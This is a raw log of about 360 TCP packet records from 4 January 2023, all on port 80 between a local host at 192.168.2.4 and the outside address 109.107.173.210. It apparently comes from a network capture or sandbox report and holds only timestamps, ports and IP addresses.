Jan 4, 2023 16:47:23.822176933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822226048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822232962 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822271109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822274923 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822320938 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822323084 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822365999 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822371006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822413921 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822418928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822462082 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822478056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822525024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822525978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822573900 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822576046 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822621107 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822623014 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822671890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822671890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822725058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822741032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822788000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822788000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822830915 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822839022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822881937 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822887897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822932959 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.822937965 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822984934 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.822988987 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823026896 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823034048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823081970 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823127985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823127985 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823167086 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823177099 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823178053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823220015 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823225975 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823268890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823273897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823323011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823337078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823379040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823384047 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823429108 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823436022 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823477030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823482037 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823523045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823529959 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823577881 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823579073 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823618889 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823623896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823667049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823671103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823718071 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823719025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823761940 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823765039 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823813915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823816061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823856115 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823860884 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823901892 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823910952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.823956013 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.823960066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.824002028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.836971998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837022066 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837038994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837054968 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837090969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837125063 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837146997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837160110 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837177038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837197065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837223053 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837232113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837251902 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837268114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837280035 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837304115 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837316036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837340117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.837352991 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.837395906 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850135088 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850200891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850275993 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850316048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850325108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850338936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850373030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850393057 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850434065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850439072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850481033 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850488901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850533009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850537062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850584030 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850584030 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850630045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850631952 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850676060 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850680113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850729942 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850765944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850816011 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850816965 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850858927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850861073 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850903034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850910902 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.850955009 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.850960016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851003885 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851008892 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851051092 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851057053 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851102114 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851104021 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851146936 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851151943 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851195097 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851201057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851243973 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851247072 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851289988 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851294994 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851344109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851344109 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851388931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851389885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851434946 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851439953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851486921 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851515055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851536989 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851542950 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851587057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851588964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851635933 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851644039 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851684093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851686001 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851732969 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851736069 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.851779938 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851813078 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851845980 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851877928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851911068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851943016 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.851974964 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852008104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852041006 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852077961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852109909 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852143049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852174997 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852207899 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852240086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852272034 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852303982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852335930 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852369070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852417946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852463961 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852477074 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852510929 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852540970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852560043 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852569103 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852607012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852617025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852653027 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852655888 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852698088 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852704048 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852746964 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852751017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852792978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852797985 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852842093 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852844954 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852889061 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852893114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852938890 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852943897 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.852989912 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.852991104 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853039026 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853040934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853086948 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853086948 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853126049 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853135109 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853178978 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853183031 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853230000 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853241920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853270054 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853279114 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853321075 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853327036 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853370905 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853374958 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853416920 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853421926 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853466034 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853470087 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853517056 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853519917 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853564024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853565931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853609085 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853611946 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853657007 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853658915 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853703976 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853708982 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853754997 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853756905 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853800058 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853806019 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853848934 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853853941 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853895903 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853902102 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853943110 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.853952885 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.853996038 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854001045 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854044914 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854048967 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854110003 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854111910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854155064 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854160070 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854201078 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854222059 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854269028 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854288101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854331970 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854350090 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854394913 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854417086 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854460955 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854477882 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854521036 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854528904 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854577065 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854577065 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854626894 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854626894 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854670048 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854674101 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854720116 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854746103 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854789972 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854794979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854839087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854844093 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854886055 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854891062 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854934931 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854940891 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.854984045 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.854989052 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855036020 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855037928 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855082989 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855084896 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855129004 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855133057 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855180979 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855206966 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855226040 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855228901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855271101 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855276108 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855319977 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855330944 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855355978 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855366945 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855407000 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.855407953 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.855453968 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.863270998 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863308907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863339901 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863369942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863401890 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863430977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863456011 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.863461018 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863492012 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863509893 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.863523960 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.863534927 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.863569975 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.881407976 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881443977 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881465912 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881489038 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881510973 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881532907 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881654024 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881659031 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.881669044 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881681919 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881695032 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881710052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.881721020 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881745100 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881768942 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881792068 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881815910 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881839991 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881863117 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881887913 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.881932974 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.881946087 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.881988049 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882013083 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882035017 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882040024 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882076025 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882096052 CET	49695	80	192.168.2.4	109.107.173.210
Jan 4, 2023 16:47:23.882141113 CET	80	49695	109.107.173.210	192.168.2.4
Jan 4, 2023 16:47:23.882181883 CET	80	49695	109.107.173.210	192.168.2.4
